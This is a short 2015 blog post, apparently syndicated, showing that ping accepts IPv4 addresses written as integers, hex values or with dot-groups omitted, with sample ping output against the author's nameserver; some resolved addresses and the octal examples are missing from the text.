IP addresses are formed out of binary sequences, we know this. The binary forms get translated to decimals for readability.

$ ping 3253719844
PING 3253719844 ( 56 data bytes
64 bytes from icmp_seq=0 ttl=57 time=17.003 ms

Pinging an integer, like 3253719844, actually works. In the background, it's converted to the real IP notation of

Let's Hex It

You probably saw this coming. If you can ping the integer notation of an IP, would the HEX value work?

$ ping 0xC1EFD324
PING 0xC1EFD324 ( 56 data bytes
64 bytes from icmp_seq=0 ttl=57 time=18.277 ms


Skipping A Dot

A great addition, thanks to Petru's comment: skipping digit-groups in the IP address.

$ ping 4.8
PING 4.8 ( 56 data bytes
64 bytes from icmp_seq=0 ttl=48 time=156.139 ms

The last digit-group is treated as the remainder of the value, so ping 4.8 actually expands to ping, because the digit '8' is treated as a 24-bit integer filling the last three bytes.

If you ever want to have fun with a junior colleague, think of these examples. Especially the octal values are very easy to miss if you place the leading zeros somewhere in the middle.

Oh and if you decide to test these examples, you'll be pinging one of our nameservers. No harm, feel free to.

The post Silly Little IP Tricks appeared first on

by Mattias Geniar at March 22, 2015 07:45 PM